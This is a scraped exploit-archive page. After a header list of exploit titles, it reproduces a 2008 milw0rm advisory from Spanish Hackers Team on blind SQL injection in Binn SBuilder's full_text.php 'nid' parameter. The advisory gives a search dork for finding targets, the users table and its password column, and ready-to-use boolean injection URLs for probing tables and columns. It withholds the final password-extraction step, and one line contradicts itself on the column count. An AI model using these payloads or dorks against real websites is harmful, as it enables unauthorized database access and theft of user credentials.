
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
75 lines
2.8 KiB
Text
Executable file
75 lines
2.8 KiB
Text
Executable file
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
|
|
--==+ Binn SBuilder (nid) Remote Blind Sql Injection Vulnerabily +==--
|
|
--==+====================================================================================+==--
|
|
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
|
|
|
|
[+] Info:
|
|
|
|
[~] Software: Binn SBuilder
|
|
[~] HomePage: http://www.cms.ge/
|
|
[~] Exploit: Blind Sql Injection [High]
|
|
[~] Where: full_text.php?nid=
|
|
[~] Bug Found By: JosS
|
|
[~] Contact: sys-project[at]hotmail.com
|
|
[~] Web: http://www.spanish-hackers.com
|
|
[~] Dork: "Powered by CMS.GE"
|
|
[~] Dork2: priv8!
|
|
|
|
[+] Important tables and columns:
|
|
|
|
[*] Tables:
|
|
|
|
[~] Table: binn_users
|
|
|
|
[*] Columns:
|
|
|
|
[~] Column: bu_id
|
|
[~] Column 2: bu_login
|
|
[~] Column 3: bu_pass
|
|
[~] Column 4: bu_name
|
|
[~] Column 5: bu_admin
|
|
[~] Column 6: bu_last_ip
|
|
[~] Column 7: bu_last_date
|
|
|
|
[+] Compression:
|
|
|
|
[~] True: http://localhost/[path]/full_text.php?nid=[NUM] and 1=1
|
|
[~] False: http://localhost/[path]/full_text.php?nid=[NUM] and 1=2
|
|
[~] Example: http://localhost/[path]/full_text.php?nid=4855 and 1=1
|
|
[~] Example2: http://localhost/[path]/full_text.php?nid=4855 and 1=2
|
|
[~] If you see the Web correctly is true, if it is not false.
|
|
|
|
[+] Exploding:
|
|
|
|
[*] Checking table:
|
|
|
|
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) >= 0
|
|
[~] Exploit2: http://localhost/[path]/full_text.php?nid=[NUM] and exists (select * from [TABLE])
|
|
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) >= 0
|
|
[~] Example2: http://localhost/[path]/full_text.php?nid=4855 and exists (select * from binn_users)
|
|
[~] If you don't see any error, it is that table exist.
|
|
|
|
[*] Checking columns number of table:
|
|
|
|
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
|
|
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(*) FROM binn_users) = 7
|
|
[~] If you don't see any error, the table has 6 columns.
|
|
|
|
[*] Checking columns of table:
|
|
|
|
[~] Exploit: http://localhost/[path]/full_text.php?nid=[NUM] AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
|
|
[~] Example: http://localhost/[path]/full_text.php?nid=4855 AND (SELECT Count(bu_pass) FROM binn_users) >= 0
|
|
[~] If you don't see any error, the column exists.
|
|
|
|
[*] Admin Password; Noob or Lammer?:
|
|
|
|
[~] Exploit: Priv8
|
|
[~] Example: Priv8
|
|
[~] Priv8 , xD.
|
|
|
|
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
|
|
--==+ JosS +==--
|
|
--==+====================================================================================+==--
|
|
[+] [The End]
|
|
|
|
# milw0rm.com [2008-01-13]
|